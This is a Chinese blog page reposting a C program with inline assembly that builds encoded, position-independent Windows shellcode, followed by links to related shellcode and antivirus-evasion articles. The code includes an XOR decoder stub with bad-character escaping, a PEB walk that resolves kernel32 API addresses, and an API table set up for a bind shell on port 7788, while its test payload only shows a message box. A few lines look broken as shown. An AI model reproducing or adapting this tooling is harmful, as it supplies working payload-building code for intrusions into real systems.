使用C语言编写通用shellcode的程序

最新推荐文章于 2023-08-12 23:38:42 发布
最新推荐文章于 2023-08-12 23:38:42 发布
阅读量1.5k 收藏 2
点赞数

/*  
使用C语言编写通用shellcode的程序  
出处:internet  
修改:Hume/冷雨飘心  
测试:Win2K SP4 Local  


*/   
#include <windows.h>   
#include <stdio.h>   
#include <winioctl.h>   


#define  DEBUG 1   


//   
//函数原型   
//   
void     DecryptSc();   
void     ShellCodes();   
void     PrintSc(char *lpBuff, int buffsize);   


//   
//用到的部分定义   
//   
#define  BEGINSTRLEN    0x08    //开始字符串长度   
#define  ENDSTRLEN      0x08    //结束标记字符的长度   
#define  nop_CODE       0x90    //填充字符   
#define  nop_LEN        0x0     //ShellCode起始的填充长度   
#define  BUFFSIZE       0x20000 //输出缓冲区大小   


#define  sc_PORT        7788    //绑定端口号 0x1e6c   
#define  sc_BUFFSIZE    0x2000  //ShellCode缓冲区大小   


#define  Enc_key        0x7A    //编码密钥   


#define  MAX_Enc_Len    0x400   //加密代码的最大长度 1024足够?   
#define  MAX_Sc_Len     0x2000  //hellCode的最大长度 8192足够?   
#define  MAX_api_strlen 0x400   //APIstr字符串的长度   
#define  API_endstr     "strend"//API结尾标记字符串       
#define  API_endstrlen  0x06    //标记字符串长度   


#define PROC_BEGIN __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90   
#define PROC_END PROC_BEGIN   
//---------------------------------------------------   
enum{       //Kernel32   
_CreatePipe,   
_CreateProcessA,   
_CloseHandle,   
_PeekNamedPipe,   
_ReadFile,   
_WriteFile,   
_ExitProcess,   


//WS2_32   
_socket,   
_bind,   
_listen,   
_accept,   
_send,   
_recv,   
_ioctlsocket,   
_closesocket,   


//本机测试User32   
_MessageBeep,   
_MessageBoxA,   
API_num   
};   


//   
//代码这里开始   
//   
int __cdecl main(int argc, char **argv)   
{   
//shellcode中要用到的字符串   
static char ApiStr[]="\x1e\x6c"   //端口地址   


//Kernel32的API函数名称   
"CreatePipe""\x0"   
"CreateProcessA""\x0"   
"CloseHandle""\x0"   
"PeekNamedPipe""\x0"   
"ReadFile""\x0"   
"WriteFile""\x0"   
"ExitProcess""\x0"   


//其它API中用到的API   
"wsock32.dll""\x0"   
"socket""\x0"   
"bind""\x0"   
"listen""\x0"   
"accept""\x0"   
"send""\x0"   
"recv""\x0"   
"ioctlsocket""\x0"   
"closesocket""\x0"   
//本机测试   
"user32.dll""\x0"   
"MessageBeep""\x0"   
"MessageBoxA""\x0"   


"\x0\x0\x0\x0\x0"   
"strend";   


char  *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";  //标记开始的字符串   
char  *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";  //标记结束的字符串   


char  buff[BUFFSIZE];         //缓冲区   
char  sc_buff[sc_BUFFSIZE];   //ShellCodes缓冲   
char  *pDcrypt_addr,   
*pSc_addr;   


int   buff_len;               //缓冲长度   
int   EncCode_len;            //加密编码代码长度   
int   Sc_len;                 //原始ShellCode的长度   


int       i,k;   
unsigned  char ch;   


//   
//获得DecryptSc()地址,解码函数的地址,然后搜索MAX_Enc_Len字节,查找标记开始的字符串   
//获得真正的解码汇编代码的开始地址,MAX_Enc_Len定义为1024字节一般这已经足够了,然后将这   
//部分代码拷贝入待输出ShellCode的缓冲区准备进一步处理   
//   
pDcrypt_addr=(char *)DecryptSc;   


//定位其实际地址,因为在用Visual Studio生成调试版本调试的情况下,编译器会生成跳转表,   
//从跳转表中要计算得出函数实际所在的地址,这只是为了方便用VC调试   


ch=*pDcrypt_addr;   
if (ch==0xe9)   
{   
pDcrypt_addr++;   
i=*(int *)pDcrypt_addr;   
pDcrypt_addr+=(i+4);      //此时指向函数的实际地址   
}   
//找到解码代码的开始部分   
for(k=0;k<MAX_Enc_Len;++k) if(memcmp(pDcrypt_addr+k,fnbgn_str,BEGINSTRLEN)==0) break;   


if (k<MAX_Enc_Len) pDcrypt_addr+=(k+8);   //如找到定位实际代码的开始   
else    
{   
//显示错误信息   
k=0;   
printf("\nNo Begin str defined in Decrypt function!Please Check before go on...\n");   
return 0;   
}   


for(k=0;k<MAX_Enc_Len;++k) if(memcmp(pDcrypt_addr+k,fnend_str,ENDSTRLEN)==0) break;   


if (k<MAX_Enc_Len) EncCode_len=k;   
else    
{   
k=0;   
printf("\nNo End str defined in Decrypt function!Please Check....\n");   
return 0;   
}   


memset(buff,nop_CODE,BUFFSIZE);                       //缓冲区填充   
memcpy(buff+nop_LEN,pDcrypt_addr,EncCode_len);        //把DecryptSc代码复制进buff   


//   
//处理ShellCode代码,如果需要定位到代码的开始   
//   
pSc_addr=(char *)ShellCodes;     //shellcode的地址   


//调试状态下的函数地址处理,便于调试   
ch=*pSc_addr;   
if (ch==0xe9)   
{   
pSc_addr++;   
i=*(int *)pSc_addr;   
pSc_addr+=(i+4);      //此时指向函数的实际地址   
}   


//如果需要定位到实际ShellCodes()的开始,这个版本中是不需要的   
/*  
for (k=0;k<MAX_Sc_Len ;++k ) if(memcmp(pSc_addr+k,fnbgn_str,BEGINSTRLEN)==0) break;  
if (k<MAX_Enc_Len) pSc_addr+=(k+8);   //如找到定位实际代码的开始  
*/   


//找到shellcode的结尾及长度   
for(k=0;k<MAX_Sc_Len;++k)
{
if(memcmp(pSc_addr+k,fnend_str,ENDSTRLEN)==0)
break;
}
if(k<MAX_Sc_Len)
Sc_len=k;   
else    
{   
k=0;   
printf("\nNo End str defined in ShellCodes function!Please Check....\n");   
return 0;   
}   


//把shellcode代码复制进sc_buff   
memcpy(sc_buff,pSc_addr,Sc_len);   


//把字符串拷贝在shellcode的结尾   
for(i=0;i<MAX_api_strlen;++i)
{
if(memcmp(ApiStr+i,"strend",API_endstrlen)==0)
break;
}
if(i>=MAX_api_strlen)
{   
printf("\nNo End str defined in API strings!Please Check....\n");   
return 0;   
}   
memcpy(sc_buff+k,ApiStr,i);   


Sc_len+=i;        //增加shellcode的长度   


//   
//对shellcode进行编码算法简单,可根据需要改变   
//   
k=EncCode_len+nop_LEN;    //定位缓冲区应存放ShellCode地址的开始   


for(i=0;i<Sc_len;++i){   


ch=sc_buff[i]^Enc_key;   
//对一些可能造成shellcode失效的字符进行替换   
if(ch==0x1f||ch==' '||ch=='.'||ch=='/'||ch=='\\'||ch=='0'||ch=='?'||ch=='%'||ch=='+'||ch==0)
{   
buff[k]='0';  
++k;   
ch+=0x31;   
}   
//把编码过的shellcode放在DecryptSc代码后面   
buff[k]=ch;   
++k;   
}   
buff[k-1]=0;
//shellcode的总长度   
buff_len=k;


//打印出shellcode   
PrintSc(buff,buff_len);   
//buff[buff_len]=0;   
//printf("%s",buff);   


#ifdef DEBUG   
_asm{   
lea eax,buff   
jmp eax   
ret   
}   
#endif   


return  0;   
}   


//解码shellcode的代码   
void  DecryptSc()   
{   
__asm{   


/   
//定义开始标志   
/   
PROC_BEGIN    //C macro to begin proc   


jmp   next   
getEncCodeAddr:   
pop   edi   
push  edi   
pop   esi   
xor   ecx,ecx   
Decrypt_lop:    
lodsb   
cmp  al,cl   
jz   shell   
cmp  al,0x30  //判断是否为特殊字符   
jz   special_char_clean   
store:         
xor  al,Enc_key   
stosb   
jmp  Decrypt_lop   
special_char_clean:      
lodsb   
sub al,0x31   
jmp store   
next:        
call  getEncCodeAddr   
//其余真正加密的shellcode代码会连接在此处   
shell:       


/   
//定义结束标志   
/   
PROC_END      //C macro to end proc   


}   
}            


//   
//shellcode代码   
//   
void ShellCodes()   
{   
//API低址数组       
FARPROC     API[API_num];   


//自己获取的API地址   
FARPROC     GetProcAddr;   
FARPROC    LoadLib;   


HANDLE      hKrnl32;   
HANDLE      libhandle;   


char        *ApiStr_addr,*p;   


int         k;   
u_short     shellcodeport;   


//测试用变量   
char        *testAddr;   


/*  
STARTUPINFO siinfo;  
SOCKET      listenFD,clientFD;  
struct      sockaddr_in server;  
int         iAddrSize = sizeof(server);  
int         lBytesRead;  
PROCESS_INFORMATION ProcessInformation;  
HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;  
SECURITY_ATTRIBUTES sa;  


*/   


_asm {   
jmp    locate_addr0   
getApiStr_addr:   
pop    ApiStr_addr   


//开始获取API的地址以及GetProcAddress和LoadLibraryA的地址   
//以后就可以方便地获取任何API的地址了   


//保护寄存器   
pushad   


xor     esi,esi   
lods    dword ptr fs:[esi]   


Search_Krnl32_lop:   
inc     eax   
je      Krnl32_Base_Ok   
dec     eax   
xchg    esi,eax   
LODSD     
jmp     Search_Krnl32_lop   
Krnl32_Base_Ok:   


LODSD                      
;compare if PE_hdr   
xchg    esi,eax   
find_pe_header:   
dec     esi   
xor     si,si           ;kernel32 is 64kb align   
mov     eax,[esi]   
add     ax,-'ZM'        ;          
jne     find_pe_header   
mov     edi,[esi+3ch]   ;.e_lfanew           
mov     eax,[esi+edi]   
add     eax,-'EP'       ;anti heuristic change this if you are using MASM etc.        
jne     find_pe_header     


push     esi   
;esi=VA Kernel32.BASE   
;edi=RVA K32.pehdr           
mov     ebx,esi   
mov     edi,[ebx+edi+78h]  ;peh.DataDirectory   


push    edi   
push    esi   


mov     eax,[ebx+edi+20h]  ;peexc.AddressOfNames                    
mov     edx,[ebx+edi+24h]  ;peexc.AddressOfNameOrdinals         
call    __getProcAddr   
_emit 0x47   
_emit 0x65   
_emit 0x74   
_emit 0x50   
_emit 0x72   
_emit 0x6F   
_emit 0x63   
_emit 0x41   
_emit 0x64   
_emit 0x64   
_emit 0x72   
_emit 0x65   
_emit 0x73   
_emit 0x73   
_emit 0x0   
//db     "GetProcAddress",0   
__getProcAddr:   
pop     edi   
mov     ecx,15           
sub     eax,4   
next_:           
add     eax,4   
add     edi,ecx   
sub     edi,15   
mov     esi,[ebx+eax]   
add     esi,ebx   
mov     ecx,15   
repz    cmpsb   
jnz     next_   


pop     esi   
pop     edi   


sub     eax,[ebx+edi+20h]      ;peexc.AddressOfNames   
shr     eax,1   
add     edx,ebx   
movzx   eax,word ptr [edx+eax]           
add     esi,[ebx+edi+1ch]       ;peexc.AddressOfFunctions   
add     ebx,[esi+eax*4]         ;ebx=Kernel32.GetProcAddress.addr   
;use GetProcAddress and hModule to get other func   
pop     esi                     ;esi=kernel32 Base   


mov     [hKrnl32],esi           //保存   
mov     [GetProcAddr],ebx       //保存   


call    _getLoadLib   
_emit 0x4C   
_emit 0x6F   
_emit 0x61   
_emit 0x64   
_emit 0x4C   
_emit 0x69   
_emit 0x62   
_emit 0x72   
_emit 0x61   
_emit 0x72   
_emit 0x79   
_emit 0x41   
_emit 0x0   
//db      "LoadLibraryA",0   


_getLoadLib:   
push    esi   
call    ebx   
mov     [LoadLib],eax   


//恢复寄存器,避免更多问题   
popad   
}   


//取出定义的端口地址   
shellcodeport=*(u_short *)ApiStr_addr;   
ApiStr_addr+=2;   


测试用   
testAddr=ApiStr_addr;   
  


//利用GetProcAddress来获得shellcode中所用到的API地址   


libhandle=hKrnl32;   
p=ApiStr_addr;   


k=0;   
///*   
while ( *((unsigned int *)p) != 0)   
{   
ApiStr_addr=p;   
while(*p) p++;   //前进到下一个字符串   


if (*( (unsigned int *)(p-4))=='lld.')   
{   
libhandle=(HANDLE)LoadLib(ApiStr_addr);  //若为DLL则加载DLL   
}   
else   
{   
API[k]=(FARPROC)GetProcAddr(libhandle,ApiStr_addr);   
k++;   
}   


ApiStr_addr=++p; //更新指针前进一个字符位置   


}   


//*/   


///   
//         下面就可以使用C语言来编写真正实现功能的shellcode了                //   
///   
//   
//简单测试几个API看是否复合要求   
//   
API[_MessageBeep](0x10);   
API[_MessageBoxA](0,testAddr,0,0x40);
API[_ExitProcess](0);
///   
//                           shellcode功能部分结束                       //   
///   


//死循环   
die:      
goto die;   
__asm   
{   
locate_addr0:     
call getApiStr_addr      //5 bytes   
//真正的字符串数据要连接在此处   


/   
//定义结束标志   
/   
PROC_END      //C macro to end proc   


}   
}   


//   
//显示打印生成的shellcode的C string格式代码   
//   
void PrintSc(char *lpBuff, int buffsize)   
{   
int i=1,j=2;   
char *p;   
char msg[5];   
for(i=0;i<buffsize;i++)   
{   
if((i%16)==0)
{
if(i!=0)
printf("\"\n\"");
else   
printf("\"");

sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);   
for( p = msg, j=0; j<4; p++, j++ )   
{   
if(isupper(*p))
printf("%c", _tolower(*p));   
else   
printf("%c", p[0]);   
}   
}   
printf("\";\n/*Shell total are %d bytes */\n",buffsize);   
}

Eric6_17
关注
通用shellcode编写、调用 实验缓冲区溢出攻击(非远程)调用shellcode实例(一)
u013582514的专栏
11-29 4501
在阅读此篇文章时,请先确定已有一些计算机功底,其中包括计算机组成原理、寄存器功能、汇编语感。 正文开始: 实验环境:windows8.1,vs2010 相信不少人听说过缓冲区溢出攻击,这是当时黑客网络攻击很关键的一种攻击方式,直到现在很多黑客找到bug后进行的攻击行为还是基于它为原理,今天我给大家简单实验一下。 首先讲一下缓冲区溢出攻击如何实现,就要
红队系列-shellcode AV bypass Evasion免杀合集
最新发布
aming小老弟
11-13 1613
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
C语言写的shellcode
03-05
C语言写的开端口的shellcode 打开9878端口的ShellCode源代码
使用C编译器编写shellcode
Tody Guo的专栏
12-08 1592
原文出处: Nick Harbour   译文出处: IDF徐文博 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代码仅能靠它自己,作者无法使用现代软件开发的实践来推
使用C编写shellcode
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
11-23 902
使用C编写shellcode 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为 shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代 码仅能靠它自己,作者无法使用现 代软件开发的实践来推进shellcode编写
1.8 运用C编写ShellCode代码
CSDN
07-13 4831
在笔者前几篇文章中,我们使用汇编语言并通过自定位的方法实现了一个简单的`MessageBox`弹窗功能,但由于汇编语言过于繁琐在编写效率上不仅要考验开发者的底层功底,还需要写出更多的指令集,这对于普通人来说是非常困难的,当然除了通过汇编来实现`ShellCode`的编写以外,使用C同样可以实现编写,在多数情况下读者可以直接使用C开发,只有某些环境下对ShellCode条件有极为苛刻的长度限制时才会考虑使用汇编。
Delphi编写本地溢出反向连接通用ShellCode
01-13
{ SinDoor One By Anskya Email:Anskya@Gmail.com Web:Www.Anskya.Net QQ:115447 说明:打开NC监听本地8848端口~运行程序返回一个Shell,本程序ShellCode:是通用ShellCode..内部镶有API搜索引擎和数据代码融合(很简单...
Metasploit中的Shellcode编写使用
## 第一章:Shellcode概述 在本章中,我们将介绍Shellcode的基本概念和原理,以及其在计算机安全领域中的作用...而在安全领域中,可以通过编写使用Shellcode来测试和评估系统的安全性,发现潜在的安全漏洞并进行漏洞
cpp-跨架构的Shellcode编译器
08-16
C++是一种通用、面向对象的编程语言,源自C语言,它提供了高级抽象和模板机制,允许开发人员编写高效且可重用的代码。在这个项目中,C++被用来构建这个Shellcode编译器,因为它能提供足够的底层控制来处理不同架构的...
shellcode编程揭秘
03-04
教你怎么写shellcode,很好的shellcode编程范例,从稳定性到安全性都有讲
linux c语言shellcode,shellcode编写
weixin_36287955的博客
05-12 847
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?​ shellcode可以用于在栈溢出或者堆溢出的漏洞中用于跳转后执行的代码。本文的代码是在ubuntu 18.04 64位的linux操作系统。​ 首先是一个用于执行shellcodec语言程序:123456char shellcode[] = "";int (int argc, char...
shellcode编写
weixin_42539095的博客
11-23 362
开发框架 地址: https://github.com/TonyChen56/ShellCodeFrame 实现功能 弹出计算器 具体实现 (1)在这个框架中,利用b.work.cpp源文件中的GetProcAddressWithHash函数,通过传入WinExec 函数的hash值,就可以获取到WinExec函数的相对地址。 (2)定义函数指针 在a.start.cpp源文件ShellCodeEntry()函数中添加WinExec("calc.exe ", SW_SHOW); 将声明复制到api.h
C语言执行shellcode的五种方法
热门推荐
云守护的专栏
05-30 1万+
//C语言执行shellcode的五种方法 #include #include //data段可读写 #pragma comment(linker, "/section:.data,RWE") //不显示窗口 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") #pragma comment
运用C编写ShellCode代码教程
高性价比服务器就选:蓝易云
08-12 295
以上是一个简单的教程,介绍了使用C语言编写ShellCode的基本步骤。由于ShellCode的复杂性和潜在的危险性,建议只在合法和授权的环境中进行相关实验和研究。请谨慎行事,并确保你对相关技术和法律的了解。需要注意的是,编写使用ShellCode涉及到计算机安全的领域,需要遵循合法和道德的原则。在进行ShellCode开发和使用之前,请确保你有合适的授权和法律许可,并遵守相关法律和规定。编写ShellCode是一项高级技术,需要深入了解计算机体系结构和操作系统底层原理。
c语言添加shellcode到,【转】 使用C语言编写提取通用shellcode程序
weixin_39876450的博客
05-25 267
该楼层疑似违规已被系统折叠隐藏此楼查看此楼出处:internet修改:Hume/冷雨飘心测试:Win2KSP4Local/Win2003SP0Local注释:我非我[F.S.T]说明:此程序可以用标准c语言string格式打印出你所在ShellCodes函数中编写shellcode用vc编译时请使用Release格式并取消优化设置,否则不能正常运行*/#include#inclu...
【笔记】使用C语言编写win32平台Shellcode
LemonLENG的博客
06-08 590
转自:http://www.tuicool.com/articles/eMJfaea — Pwn150 Word2003部分 例子: /* void *get_kernel32_base() { __asm { push ebp xor ecx,ecx mov esi,fs:0x30 ;        //fs:30为PEB指针 mov esi, [esi + 0x0C
微小Shellcode编写技术
在《WritingSmallShellcode》中,作者不仅展示了具体的Shellcode实现,还讨论了一些编写小型Shellcode通用策略。这些策略可能包括优化指令选择、减少不必要的数据和指令、以及利用编码技巧来压缩代码。此外,文档...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值